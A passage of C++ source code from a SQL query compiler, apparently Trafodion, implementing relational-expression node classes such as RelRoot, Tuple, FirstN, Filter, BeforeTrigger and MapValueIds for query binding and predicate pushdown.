parentForRowsetReqdOrder_(NULL), isEmptySelectList_(FALSE), isDontOpenNewScope_(FALSE), triggersList_(NULL), spOutParams_(NULL), downrevCompileMXV_(COM_VERS_CURR_PLAN), numExtractStreams_(0), numBMOs_(0), BMOsMemoryUsage_(0), nBMOsMemoryUsage_(0), uninitializedMvList_(NULL), allOrderByRefsInGby_(FALSE), avoidHalloween_(FALSE), containsOnStatementMV_(FALSE), containsLRU_(FALSE), disableESPParallelism_(FALSE), hasOlapFunctions_(FALSE), hasTDFunctions_(FALSE), isAnalyzeOnly_(FALSE), hasMandatoryXP_(FALSE), partReqType_(ANY_PARTITIONING), partitionByTree_(NULL), predExprTree_(NULL), firstNRowsParam_(NULL), flags_(0) { accessOptions().accessType() = TransMode::ACCESS_TYPE_NOT_SPECIFIED_; accessOptions().lockMode() = LOCK_MODE_NOT_SPECIFIED_; isCIFOn_ = FALSE; } RelRoot::RelRoot(RelExpr *input, TransMode::AccessType at, LockMode lm, OperatorTypeEnum otype, ItemExpr *compExpr, ItemExpr *orderBy, ItemExpr *updateCol, RelExpr *reqdShape, CollHeap *oHeap) : RelExpr(otype, input, NULL, oHeap), compExprTree_(compExpr), orderByTree_(orderBy), updateColTree_(updateCol), reqdShape_(reqdShape), viewStoiList_(CmpCommon::statementHeap()), ddlStoiList_(CmpCommon::statementHeap()), stoiUdrList_(CmpCommon::statementHeap()), udfList_(CmpCommon::statementHeap()), securityKeySet_(CmpCommon::statementHeap()), trueRoot_(FALSE), subRoot_(FALSE), displayTree_(FALSE), outputVarCnt_(-1), inputVarTree_(NULL), outputVarTree_(NULL), updatableSelect_(TRUE), updateCurrentOf_(FALSE), currOfCursorName_(NULL), rollbackOnError_(FALSE), readOnlyTransIsOK_(FALSE), needFirstSortedRows_(FALSE), numSimpleVar_(0), numHostVar_(0), childOperType_(NO_OPERATOR_TYPE), hostArraysArea_(NULL), assignmentStTree_(NULL), assignList_(NULL), isRootOfInternalRefresh_(FALSE), isQueryNonCacheable_(FALSE), pMvBindContextForScope_(NULL), parentForRowsetReqdOrder_(NULL), isEmptySelectList_(FALSE), isDontOpenNewScope_(FALSE), triggersList_(NULL), spOutParams_(NULL), downrevCompileMXV_(COM_VERS_CURR_PLAN), numExtractStreams_(0), numBMOs_(0), BMOsMemoryUsage_(0), nBMOsMemoryUsage_(0), uninitializedMvList_(NULL), allOrderByRefsInGby_(FALSE), avoidHalloween_(FALSE), containsOnStatementMV_(FALSE), containsLRU_(FALSE), disableESPParallelism_(FALSE), hasOlapFunctions_(FALSE), hasTDFunctions_(FALSE), isAnalyzeOnly_(FALSE), hasMandatoryXP_(FALSE), partReqType_(ANY_PARTITIONING), partitionByTree_(NULL), predExprTree_(NULL), firstNRowsParam_(NULL), flags_(0) { accessOptions().accessType() = at; accessOptions().lockMode() = lm; isCIFOn_ = FALSE; } // Why not just use the default copy ctor that C++ provides automatically, ## // rather than having to maintain this??? ## // Is it because of the "numXXXVar_(0)" lines below, ## // or should those be "numXXXVar_(other.numXXXVar_)" ? ## RelRoot::RelRoot(const RelRoot & other) : RelExpr(REL_ROOT, other.child(0)), compExprTree_(other.compExprTree_), orderByTree_(other.orderByTree_), updateColTree_(other.updateColTree_), reqdShape_(other.reqdShape_), viewStoiList_(other.viewStoiList_), ddlStoiList_(other.ddlStoiList_), stoiUdrList_(other.stoiUdrList_), udfList_(other.udfList_), securityKeySet_(other.securityKeySet_), trueRoot_(other.trueRoot_), subRoot_(other.subRoot_), displayTree_(other.displayTree_), outputVarCnt_(other.outputVarCnt_), inputVarTree_(other.inputVarTree_), outputVarTree_(other.outputVarTree_), updatableSelect_(other.updatableSelect_), updateCurrentOf_(other.updateCurrentOf_), currOfCursorName_(other.currOfCursorName_), rollbackOnError_(other.rollbackOnError_), readOnlyTransIsOK_(other.readOnlyTransIsOK_), needFirstSortedRows_(other.needFirstSortedRows_), isRootOfInternalRefresh_(other.isRootOfInternalRefresh_), isQueryNonCacheable_(other.isQueryNonCacheable_), pMvBindContextForScope_(other.pMvBindContextForScope_), isEmptySelectList_(other.isEmptySelectList_), isDontOpenNewScope_(other.isDontOpenNewScope_), // oltOptInfo_(other.oltOptInfo_), numSimpleVar_(0), //## bug? numHostVar_(0), //## bug? childOperType_(other.childOperType_), hostArraysArea_(other.hostArraysArea_), assignmentStTree_(other.assignmentStTree_), assignList_(other.assignList_), triggersList_(other.triggersList_), compExpr_(other.compExpr_), reqdOrder_(other.reqdOrder_), partArrangement_(other.partArrangement_), updateCol_(other.updateCol_), inputVars_(other.inputVars_), accessOptions_(other.accessOptions_), pkeyList_(other.pkeyList_), rowsetReqdOrder_(other.rowsetReqdOrder_), parentForRowsetReqdOrder_(other.parentForRowsetReqdOrder_), spOutParams_ (NULL), // Raj P - 12/2000 - stored procedures (for java) downrevCompileMXV_(COM_VERS_CURR_PLAN), uninitializedMvList_(other.uninitializedMvList_), allOrderByRefsInGby_(other.allOrderByRefsInGby_), numExtractStreams_(other.numExtractStreams_), numBMOs_(other.numBMOs_), BMOsMemoryUsage_(other.BMOsMemoryUsage_), nBMOsMemoryUsage_(other.nBMOsMemoryUsage_), avoidHalloween_(other.avoidHalloween_), disableESPParallelism_(other.disableESPParallelism_), containsOnStatementMV_(other.containsOnStatementMV_), containsLRU_(other.containsLRU_), hasOlapFunctions_(other.hasOlapFunctions_), hasTDFunctions_(other.hasTDFunctions_ ), isAnalyzeOnly_(FALSE), hasMandatoryXP_(other.hasMandatoryXP_), partReqType_(other.partReqType_), partitionByTree_(other.partitionByTree_), isCIFOn_(other.isCIFOn_), predExprTree_(other.predExprTree_), firstNRowsParam_(other.firstNRowsParam_), flags_(other.flags_) { oltOptInfo() = ((RelRoot&)other).oltOptInfo(); setRETDesc(other.getRETDesc()); } RelRoot::~RelRoot() { // Explicitly deleting our members is deliberately not being done -- // we should allocate all RelExpr's on the appropriate heap // (as a NABasicObject) and free the (stmt) heap all in one blow. // delete compExprTree_; // delete orderByTree_; // delete reqdShape_; // delete inputVarTree_; } Int32 RelRoot::getArity() const { return 1; } void RelRoot::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); // // Assign the select list as the outputs // outputValues.insertList(compExpr()); } // RelRoot::getPotentialOutputValues() void RelRoot::pushdownCoveredExpr(const ValueIdSet & outputExpr, const ValueIdSet & newExternalInputs, ValueIdSet & predicatesOnParent, const ValueIdSet * setOfValuesReqdByParent, Lng32 //childIndex ignored ) { //--------------------------------------------------------------------- // case 10-030708-7671: In the case of a cast, the RelRoot operator // needs to ask for original expression it is casting; if it asks for // the cast expression, the child may be incapable of producing it. For // example, a nested join operator can't produce the cast expression, // unless produced by its children //--------------------------------------------------------------------- ValueIdSet originalOutputs = getGroupAttr()->getCharacteristicOutputs(); ValueIdSet updateOutputs(originalOutputs); updateOutputs.replaceCastExprWithOriginal(originalOutputs, this); ValueIdSet myCharInput = getGroupAttr()->getCharacteristicInputs(); // since the orderby list is not a subset of the select list include it. ValueIdSet allMyExpr; ValueIdList orderByList = reqdOrder(); allMyExpr.insertList(orderByList); // add the primary key columns, if they are to be returned. if (updatableSelect() == TRUE) { allMyExpr.insertList(pkeyList()); } // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(updateOutputs, myCharInput, predicatesOnParent, &allMyExpr ); // All expressions should have been pushed CMPASSERT(predicatesOnParent.isEmpty()); } // RelRoot::pushdownCoveredExpr const NAString RelRoot::getText() const { NAString result("root"); #ifdef DEBUG_TRIGGERS char totalNodes[20]; sprintf(totalNodes, "(total %d nodes)", nodeCount()); result += totalNodes; if (isDontOpenNewScope()) result += "(no_scope)"; if (isEmptySelectList()) result += "(empty_select_list)"; #endif return result; } HashValue RelRoot::topHash() { HashValue result = RelExpr::topHash(); // it's not (yet) needed to produce a really good hash value for this node result ^= compExpr_.entries(); result ^= inputVars_.entries(); // result ^= compExpr_; // result ^= inputVars_; return result; } NABoolean RelRoot::duplicateMatch(const RelExpr & other) const { if (!RelExpr::duplicateMatch(other)) return FALSE; RelRoot &o = (RelRoot &) other; if (NOT (compExpr_ == o.compExpr_) OR NOT (inputVars_ == o.inputVars_)) return FALSE; if (avoidHalloween_ != o.avoidHalloween_) return FALSE; if (disableESPParallelism_ != o.disableESPParallelism_) return FALSE; if (isAnalyzeOnly_ != o.isAnalyzeOnly_) return FALSE; return TRUE; } RelExpr * RelRoot::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RelRoot *result; if (derivedNode == NULL) result = new (outHeap) RelRoot(NULL, getOperatorType(), NULL, NULL, NULL, NULL, outHeap); else result = (RelRoot *) derivedNode; if (compExprTree_ != NULL) result->compExprTree_ = compExprTree_->copyTree(outHeap)->castToItemExpr(); if (inputVarTree_ != NULL) result->inputVarTree_ = inputVarTree_->copyTree(outHeap)->castToItemExpr(); if (outputVarTree_ != NULL) result->outputVarTree_ = outputVarTree_->copyTree(outHeap)->castToItemExpr(); if (predExprTree_ != NULL) result->predExprTree_ = predExprTree_->copyTree(outHeap)->castToItemExpr(); result->compExpr_ = compExpr_; result->inputVars_ = inputVars_; result->accessOptions_ = accessOptions_; result->updatableSelect_ = updatableSelect_; result->updateCurrentOf_ = updateCurrentOf_; if (currOfCursorName()) result->currOfCursorName_ = currOfCursorName()->copyTree(outHeap)->castToItemExpr(); result->rollbackOnError_ = rollbackOnError_; result->isEmptySelectList_ = isEmptySelectList_; result->isDontOpenNewScope_ = isDontOpenNewScope_; result->oltOptInfo() = oltOptInfo(); result->childOperType_ = childOperType_; result->rowsetReqdOrder_ = rowsetReqdOrder_; result->parentForRowsetReqdOrder_ = parentForRowsetReqdOrder_; // Raj P - 12/2000 stored procedures (for java) if ( spOutParams_ ) { result->spOutParams_ = new ItemExprList (outHeap); (*result->spOutParams_) = *spOutParams_; } if( uninitializedMvList_ ) { result->uninitializedMvList_ = new UninitializedMvNameList (outHeap); result->uninitializedMvList_->insert( *uninitializedMvList_ ); } result->setDownrevCompileMXV(getDownrevCompileMXV()); result->numExtractStreams_ = numExtractStreams_; result->allOrderByRefsInGby_ = allOrderByRefsInGby_; result->avoidHalloween_ = avoidHalloween_; result->disableESPParallelism_ = disableESPParallelism_; result->containsOnStatementMV_ = containsOnStatementMV_; result->hasOlapFunctions_ = hasOlapFunctions_; result->containsLRU_ = containsLRU_; result->isAnalyzeOnly_ = isAnalyzeOnly_; result->hasMandatoryXP_ = hasMandatoryXP_ ; if (partitionByTree_ != NULL) result->partitionByTree_ = partitionByTree_->copyTree(outHeap)->castToItemExpr(); result->partReqType_ = partReqType_ ; result->isQueryNonCacheable_ = isQueryNonCacheable_; result->firstNRowsParam_ = firstNRowsParam_; result->flags_ = flags_; return RelExpr::copyTopNode(result, outHeap); } void RelRoot::addCompExprTree(ItemExpr *compExpr) { ExprValueId c = compExprTree_; ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(compExpr); compExprTree_ = c.getPtr(); } ItemExpr * RelRoot::removeCompExprTree() { ItemExpr * result = compExprTree_; compExprTree_ = NULL; return result; } void RelRoot::addPredExprTree(ItemExpr *predExpr) { ExprValueId c = predExprTree_; ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(predExpr); predExprTree_ = c.getPtr(); } ItemExpr * RelRoot::removePredExprTree() { ItemExpr * result = predExprTree_; predExprTree_ = NULL; return result; } void RelRoot::addInputVarTree(ItemExpr *inputVar) { ExprValueId c = inputVarTree_; ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(inputVar); inputVarTree_ = c.getPtr(); } void RelRoot::addAtTopOfInputVarTree(ItemExpr *inputVar) { ExprValueId c = inputVarTree_; ItemExprTreeAsList(&c, ITM_ITEM_LIST).insertAtTop(inputVar); inputVarTree_ = c.getPtr(); } ItemExpr * RelRoot::removeInputVarTree() { ItemExpr * result = inputVarTree_; inputVarTree_ = NULL; return result; } void RelRoot::addOutputVarTree(ItemExpr *outputVar) { if (!outputVarTree_) { outputVarTree_ = new(CmpCommon::statementHeap()) ItemList(outputVar, NULL); } else { ItemExpr *start = outputVarTree_; while (start->child(1)) { start = start->child(1); } start->child(1) = new(CmpCommon::statementHeap()) ItemList(outputVar, NULL); } } // Used by Assignment Statement in a Compound Statement. It adds a host variable // to assignmentStTree_ void RelRoot::addAssignmentStTree(ItemExpr *inputOutputVar) { if (!assignmentStTree_) { assignmentStTree_ = new(CmpCommon::statementHeap()) ItemList(inputOutputVar, NULL); } else { ItemExpr *start = assignmentStTree_; while (start->child(1)) { start = start->child(1); } start->child(1) = new(CmpCommon::statementHeap()) ItemList(inputOutputVar, NULL); } } ItemExpr * RelRoot::removeOutputVarTree() { ItemExpr * result = outputVarTree_; outputVarTree_ = NULL; return result; } void RelRoot::addOrderByTree(ItemExpr *orderBy) { ExprValueId c = orderByTree_; ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(orderBy); orderByTree_ = c.getPtr(); } ItemExpr * RelRoot::removeOrderByTree() { ItemExpr * result = orderByTree_; orderByTree_ = NULL; return result; } void RelRoot::addPartitionByTree(ItemExpr *partBy) { ExprValueId c = partitionByTree_; ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(partBy); partitionByTree_ = c.getPtr(); } ItemExpr * RelRoot::removePartitionByTree() { ItemExpr * result = partitionByTree_; partitionByTree_ = NULL; return result; } void RelRoot::addUpdateColTree(ItemExpr *updateCol) { ExprValueId c = updateColTree_; ItemExprTreeAsList(&c, ITM_ITEM_LIST).insert(updateCol); updateColTree_ = c.getPtr(); } ItemExpr * RelRoot::removeUpdateColTree() { ItemExpr * result = updateColTree_; updateColTree_ = NULL; return result; } void RelRoot::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (compExprTree_ != NULL OR compExpr_.entries() == 0) xlist.insert(compExprTree_); else xlist.insert(compExpr_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("select_list"); if (inputVarTree_ != NULL OR inputVars_.entries() > 0) { if (inputVars_.entries() == 0) xlist.insert(inputVarTree_); else xlist.insert(inputVars_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("input_variables"); } if (orderByTree_ != NULL OR reqdOrder_.entries() > 0) { if (reqdOrder_.entries() == 0) xlist.insert(orderByTree_); else xlist.insert(reqdOrder_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("order_by"); } if ((partitionByTree_ != NULL) OR (partArrangement_.entries() > 0)) { if (partArrangement_.entries() == 0) xlist.insert(partitionByTree_); else xlist.insert(partArrangement_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("partition_by"); } if (updateColTree_ != NULL OR updateCol_.entries() > 0) { if (updateCol_.entries() == 0) xlist.insert(updateColTree_); else xlist.insert(updateCol_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("update_col"); } if (reqdShape_ != NULL) { xlist.insert(reqdShape_); llist.insert("must_match"); } RelExpr::addLocalExpr(xlist,llist); } //---------------------------------------------------------------------------- //++ MV OZ NABoolean RelRoot::hasMvBindContext() const { return (NULL != pMvBindContextForScope_) ? TRUE : FALSE; } MvBindContext * RelRoot::getMvBindContext() const { return pMvBindContextForScope_; } void RelRoot::setMvBindContext(MvBindContext * pMvBindContext) { pMvBindContextForScope_ = pMvBindContext; } void RelRoot::addOneRowAggregates(BindWA* bindWA) { RelExpr * childOfRoot = child(0); GroupByAgg *aggNode = NULL; // If the One Row Subquery is already enforced by a scalar aggregate // then we do not need to add an additional one row aggregate. The exceptions to // this rule is if we have count(t1.a) where t1 itself is a one row subquery. // Note that the count is needed in order to have a groupby below the root node. // See soln. 10-071105-8680 // Another exception is when the select list has say max(a) + select a from t1 // In this case there is a onerowsubquery in the select list but it is a child // of BiArith. Due to all these exceptions we are simply going to scan the select // list. As soon as we find something other than an aggregate we take the safe // way out and add a one row aggregate. // Also if the groupby is non scalar then we need to add a one row aggregate. // Also if we have select max(a) + select b from t1 from t2; if (childOfRoot->getOperatorType() == REL_GROUPBY) { aggNode = (GroupByAgg *)childOfRoot; if (!aggNode->groupExpr().isEmpty()) aggNode = NULL; // Check to see if the compExpr contains a subquery. for (CollIndex i=0; i < compExpr().entries(); i++) if (compExpr()[i].getItemExpr()->containsOpType(ITM_ROW_SUBQUERY)) { aggNode = NULL ; break; } } if (aggNode) return ; const RETDesc *oldTable = getRETDesc(); RETDesc *resultTable = new(bindWA->wHeap()) RETDesc(bindWA); // Transform select list such that that each item has a oneRow parent. for (CollIndex selectListIndex=0; selectListIndex < compExpr().entries(); selectListIndex++) { ItemExpr *colExpr = compExpr()[selectListIndex].getItemExpr(); // Build a new OneRow aggregate on top of the existing expression. ItemExpr *newColExpr = new(bindWA->wHeap()) Aggregate(ITM_ONEROW, colExpr); newColExpr->bindNode(bindWA); ColumnNameMap *xcnmEntry = oldTable->findColumn(compExpr()[selectListIndex]); if (xcnmEntry) // ## I don't recall when this case occurs... resultTable->addColumn(bindWA, xcnmEntry->getColRefNameObj(), newColExpr->getValueId(), USER_COLUMN, xcnmEntry->getColumnDesc()->getHeading()); else { ColRefName colRefName; resultTable->addColumn(bindWA, colRefName, newColExpr->getValueId()); } // Replace the select list expression with the new one. compExpr()[selectListIndex] = newColExpr->getValueId(); } ValueIdSet aggregateExpr(compExpr()) ; GroupByAgg *newGrby = NULL; newGrby = new(bindWA->wHeap()) GroupByAgg(childOfRoot, aggregateExpr); newGrby->bindNode(bindWA) ; child(0) = newGrby ; // Set the return descriptor // setRETDesc(resultTable); } // ----------------------------------------------------------------------- // member functions for class PhysicalRelRoot // ----------------------------------------------------------------------- NABoolean PhysicalRelRoot::isLogical() const { return FALSE; } NABoolean PhysicalRelRoot::isPhysical() const { return TRUE; } // ----------------------------------------------------------------------- // methods for class Tuple // ----------------------------------------------------------------------- THREAD_P Lng32 Tuple::idCounter_(0); Tuple::Tuple(const Tuple & other) : RelExpr(other.getOperatorType()) { selectionPred() = other.getSelectionPred(); tupleExprTree_ = other.tupleExprTree_; tupleExpr_ = other.tupleExpr_; rejectPredicates_ = other.rejectPredicates_; id_ = other.id_; } Tuple::~Tuple() {} Int32 Tuple::getArity() const { return 0; } // ----------------------------------------------------------------------- // A virtual method for computing output values that an operator can // produce potentially. // ----------------------------------------------------------------------- void Tuple::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); outputValues.insertList( tupleExpr() ); } // Tuple::getPotentialOutputValues() HashValue Tuple::topHash() { HashValue result = RelExpr::topHash(); result ^= tupleExpr_.entries(); return result; } NABoolean Tuple::duplicateMatch(const RelExpr & other) const { if (!RelExpr::duplicateMatch(other)) return FALSE; Tuple &o = (Tuple &) other; if (NOT (tupleExpr_ == o.tupleExpr_)) return FALSE; if (NOT (id_ == o.id_)) return FALSE; return TRUE; } RelExpr * Tuple::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Tuple *result; if (derivedNode == NULL) result = new (outHeap) Tuple(NULL,outHeap); else result = (Tuple *) derivedNode; if (tupleExprTree_ != NULL) result->tupleExprTree_ = tupleExprTree_->copyTree(outHeap)->castToItemExpr(); result->tupleExpr_ = tupleExpr_; result->id_ = id_; return RelExpr::copyTopNode(result, outHeap); } void Tuple::addTupleExprTree(ItemExpr *tupleExpr) { ExprValueId t = tupleExprTree_; ItemExprTreeAsList(&t, ITM_ITEM_LIST).insert(tupleExpr); tupleExprTree_ = t.getPtr(); } ItemExpr * Tuple::removeTupleExprTree() { ItemExpr * result = tupleExprTree_; tupleExprTree_ = NULL; return result; } void Tuple::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (tupleExprTree_ != NULL OR NOT tupleExpr_.isEmpty()) { if(tupleExpr_.isEmpty()) xlist.insert(tupleExprTree_); else xlist.insert(tupleExpr_.rebuildExprTree(ITM_ITEM_LIST)); llist.insert("tuple_expr"); } RelExpr::addLocalExpr(xlist,llist); } const NAString Tuple::getText() const { NAString tmp("values ", CmpCommon::statementHeap()); if (tupleExprTree()) tupleExprTree()->unparse(tmp); else ((ValueIdList &)tupleExpr()).unparse(tmp); return tmp; } // ----------------------------------------------------------------------- // methods for class TupleList // ----------------------------------------------------------------------- TupleList::TupleList(const TupleList & other) : Tuple(other) { castToList_ = other.castToList_; createdForInList_ = other.createdForInList_; } RelExpr * TupleList::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { TupleList *result; if (derivedNode == NULL) result = new (outHeap) TupleList(NULL,outHeap); else result = (TupleList *) derivedNode; result->castToList() = castToList(); return Tuple::copyTopNode(result, outHeap); } void TupleList::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { Tuple::addLocalExpr(xlist,llist); } const NAString TupleList::getText() const { NAString tmp("TupleList",CmpCommon::statementHeap()); return tmp; } // ----------------------------------------------------------------------- // member functions for class PhysicalTuple // ----------------------------------------------------------------------- NABoolean PhysicalTuple::isLogical() const { return FALSE; } NABoolean PhysicalTuple::isPhysical() const { return TRUE; } // ----------------------------------------------------------------------- // Member functions for class FirstN // ----------------------------------------------------------------------- RelExpr * FirstN::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { FirstN *result; if (derivedNode == NULL) { result = new (outHeap) FirstN(NULL, getFirstNRows(), isFirstN(), getFirstNRowsParam(), outHeap); result->setCanExecuteInDp2(canExecuteInDp2()); } else result = (FirstN *) derivedNode; result->reqdOrder().insert(reqdOrder()); return RelExpr::copyTopNode(result, outHeap); } const NAString FirstN::getText() const { NAString result(CmpCommon::statementHeap()); result = "FirstN"; return result; } // helper method to determine if we have a child Fisrt N node that can execute in Dp2. // This method will only search nodes with one child. We do not expect the child First N // to occur below a join or union type node. This method will unwind as soon as the first // FirstN child is found. static NABoolean haveChildFirstNInDp2 (RelExpr * node) { if (node->getArity() != 1) return FALSE; if (node->child(0)) { if (node->child(0)->getOperatorType() == REL_FIRST_N) { // child is FirstN FirstN * innerFirstN = (FirstN *) node->child(0)->castToRelExpr(); if (innerFirstN->canExecuteInDp2()) return TRUE; else return FALSE; } else { // have child but it is not FirstN return (haveChildFirstNInDp2(node->child(0))); } } else return FALSE; // no child even though arity is 1! } RelExpr * FirstN::bindNode(BindWA *bindWA) { if (nodeIsBound()) { bindWA->getCurrentScope()->setRETDesc(getRETDesc()); return this; } if (bindWA->isEmbeddedIUDStatement() && haveChildFirstNInDp2(this)) { setCanExecuteInDp2(TRUE); } return RelExpr::bindNode(bindWA); } NABoolean FirstN::computeRowsAffected() const { if (child(0)) { return child(0)->castToRelExpr()->computeRowsAffected(); } return FALSE; } // member functions for class Filter // ----------------------------------------------------------------------- Filter::~Filter() {} Int32 Filter::getArity() const { return 1; } HashValue Filter::topHash() { HashValue result = RelExpr::topHash(); return result; } NABoolean Filter::duplicateMatch(const RelExpr & other) const { return RelExpr::duplicateMatch(other); } RelExpr * Filter::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { Filter *result; if (derivedNode == NULL) result = new (outHeap) Filter(NULL, outHeap); else result = (Filter *) derivedNode; return RelExpr::copyTopNode(result, outHeap); } void Filter::getPotentialOutputValues(ValueIdSet & outputValues) const { outputValues.clear(); outputValues += child(0)->getGroupAttr()->getCharacteristicOutputs(); } // Filter::getPotentialOutputValues() const NAString Filter::getText() const { return "filter"; } // ----------------------------------------------------------------------- // member functions for class Rename // ----------------------------------------------------------------------- Rename::~Rename() {} Int32 Rename::getArity() const { return 1; } HashValue Rename::topHash() { ABORT("Hash functions can't be called in the parser"); return 0x0; } NABoolean Rename::duplicateMatch(const RelExpr & /* other */) const { ABORT("Duplicate match doesn't work in the parser"); return FALSE; } // ----------------------------------------------------------------------- // member functions for class RenameTable // ----------------------------------------------------------------------- RenameTable::~RenameTable() {} const NAString RenameTable::getText() const { return ("rename_as " + newTableName_.getCorrNameAsString()); } RelExpr * RenameTable::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RenameTable *result; if (derivedNode == NULL) result = new (outHeap) RenameTable(TRUE, NULL, newTableName_, NULL, outHeap); else result = (RenameTable *) derivedNode; if (newColNamesTree_ != NULL) result->newColNamesTree_ = newColNamesTree_->copyTree(outHeap)->castToItemExpr(); if (viewNATable_ != NULL) result->viewNATable_ = viewNATable_; return RelExpr::copyTopNode(result, outHeap); } ItemExpr * RenameTable::removeColNameTree() { ItemExpr * result = newColNamesTree_; newColNamesTree_ = NULL; return result; } void RenameTable::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { xlist.insert(newColNamesTree_); llist.insert("new_col_names"); RelExpr::addLocalExpr(xlist,llist); } // ----------------------------------------------------------------------- // member functions for class RenameReference // ----------------------------------------------------------------------- RenameReference::~RenameReference() {} const NAString RenameReference::getText() const { NAString text("rename_ref"); for (CollIndex i=0; i<tableReferences_.entries(); i++) text += " " + tableReferences_[i].getRefName(); return text; } RelExpr * RenameReference::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { RenameReference *result; if (derivedNode == NULL) { TableRefList *tableRef = new(outHeap) TableRefList(tableReferences_); result = new (outHeap) RenameReference(NULL, *tableRef, outHeap); } else result = (RenameReference *) derivedNode; return RelExpr::copyTopNode(result, outHeap); } void RenameReference::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { RelExpr::addLocalExpr(xlist,llist); } // ----------------------------------------------------------------------- // member functions for class BeforeTrigger // ----------------------------------------------------------------------- BeforeTrigger::~BeforeTrigger() {} Int32 BeforeTrigger::getArity() const { if (child(0) == NULL) return 0; else return 1; } const NAString BeforeTrigger::getText() const { NAString text("before_trigger: "); if (signal_) text += "Signal"; else text += "Set"; return text; } RelExpr * BeforeTrigger::copyTopNode(RelExpr *derivedNode, CollHeap* outHeap) { BeforeTrigger *result; if (derivedNode == NULL) { TableRefList *tableRef = new(outHeap) TableRefList(tableReferences_); ItemExpr *whenClause = NULL; if (whenClause_ != NULL) whenClause = whenClause_->copyTree(outHeap); if (isSignal_) { RaiseError *signalClause = (RaiseError *)signal_->copyTree(outHeap); result = new (outHeap) BeforeTrigger(*tableRef, whenClause, signalClause, outHeap); } else { CMPASSERT(setList_ != NULL); // Must have either SET or SIGNAL clause. ItemExprList *setList = new(outHeap) ItemExprList(setList_->entries(), outHeap); for (CollIndex i=0; i<setList_->entries(); i++) setList->insert(setList_->at(i)->copyTree(outHeap)); result = new (outHeap) BeforeTrigger(*tableRef, whenClause, setList, outHeap); } } else result = (BeforeTrigger *) derivedNode; return RelExpr::copyTopNode(result, outHeap); } void BeforeTrigger::addLocalExpr(LIST(ExprNode *) &xlist, LIST(NAString) &llist) const { if (whenClause_ != NULL) { llist.insert("WHEN clause"); xlist.insert(whenClause_); } if (signal_) { llist.insert("SIGNAL clause"); xlist.insert(signal_); } else { for (CollIndex i=0; i<setList_->entries(); i++) { llist.insert("SET clause"); xlist.insert(setList_->at(i)); } } RelExpr::addLocalExpr(xlist,llist); } // ----------------------------------------------------------------------- // member functions for class MapValueIds // ----------------------------------------------------------------------- MapValueIds::~MapValueIds() { } Int32 MapValueIds::getArity() const { return 1; } void MapValueIds::pushdownCoveredExpr( const ValueIdSet & outputExpr, const ValueIdSet & newExternalInputs, ValueIdSet & predicatesOnParent, const ValueIdSet * setOfValuesReqdByParent, Lng32 childIndex) { // --------------------------------------------------------------------- // Since the MapValueIds node rewrites predicates, the characteristic // outputs of the node usually make no sense to the child node. For // this reason, translate the characteristic outputs of this node before // passing them down to the children. // --------------------------------------------------------------------- ValueIdSet requiredValues; if (setOfValuesReqdByParent) requiredValues = *setOfValuesReqdByParent; ValueIdSet translatedOutputs; ValueIdSet predsRewrittenForChild; ValueIdSet outputValues(outputExpr); // first subtract the outputs from the required values, then add back // the translated outputs outputValues -= getGroupAttr()->getCharacteristicOutputs(); getMap().rewriteValueIdSetDown(getGroupAttr()->getCharacteristicOutputs(), translatedOutputs); outputValues += translatedOutputs; translatedOutputs.clear(); requiredValues -= getGroupAttr()->getCharacteristicOutputs(); getMap().rewriteValueIdSetDown(getGroupAttr()->getCharacteristicOutputs(), translatedOutputs); requiredValues += translatedOutputs; if (cseRef_) { // If this MapValueIds node represents a common subexpression, // then don't try to push predicates again that already have // been pushed down before. VEGPredicates may not be pushable // at all to the rewritten child, and other predicates might // be duplicated with different ValueIds for the internal // operators such as "=", "+", ">". predicatesOnParent -= cseRef_->getPushedPredicates(); // Also, don't push down VEGPredicates on columns that are // characteristic outputs of the MapValueIds. Those predicates // (or their equivalents) should have already been pushed down. for (ValueId g=predicatesOnParent.init(); predicatesOnParent.next(g); predicatesOnParent.advance(g)) if (g.getItemExpr()->getOperatorType() == ITM_VEG_PREDICATE) { VEG *veg = static_cast<VEGPredicate *>(g.getItemExpr())->getVEG(); ValueId vegRef(veg->getVEGReference()->getValueId()); if (newExternalInputs.contains(vegRef)) { // We are trying to push down a VEGPred and we are at // the same time offering the VEGRef as a new // characteristic input. Example: We want to push // VEGPred_2(a=b) down and we offer its corresponding // VEGRef_1(a,b) as an input. The map in our // MapValueIds node maps VEGRef_1(a,b) on the top to // VEGRef_99(x,y) on the bottom. Note that either one // of the VEGies might contain a constant that the // other one doesn't contain. Note also that the // MapValueIds node doesn't map characteristic inputs, // those are passed unchanged to the child. So, we need // to generate a predicate for the child that: // a) represents the semantics of VEGPred_2(a,b) // b) compares the new characteristic input // VEGRef_1(a,b) with some value in the child // c) doesn't change the members of the existing // VEGies. // The best solution is probably an equals predicate // between the characteristic input and the VEGRef // (or other expression) that is the child's equivalent. // Example: VEGRef_1(a,b) = VEGRef_99(x,y) ValueId bottomVal; ItemExpr *eqPred = NULL; map_.mapValueIdDown(vegRef, bottomVal); if (vegRef != bottomVal && bottomVal != NULL_VALUE_ID) { eqPred = new(CmpCommon::statementHeap()) BiRelat( ITM_EQUAL, vegRef.getItemExpr(), bottomVal.getItemExpr(), veg->getSpecialNulls()); eqPred->synthTypeAndValueId(); // replace g with the new 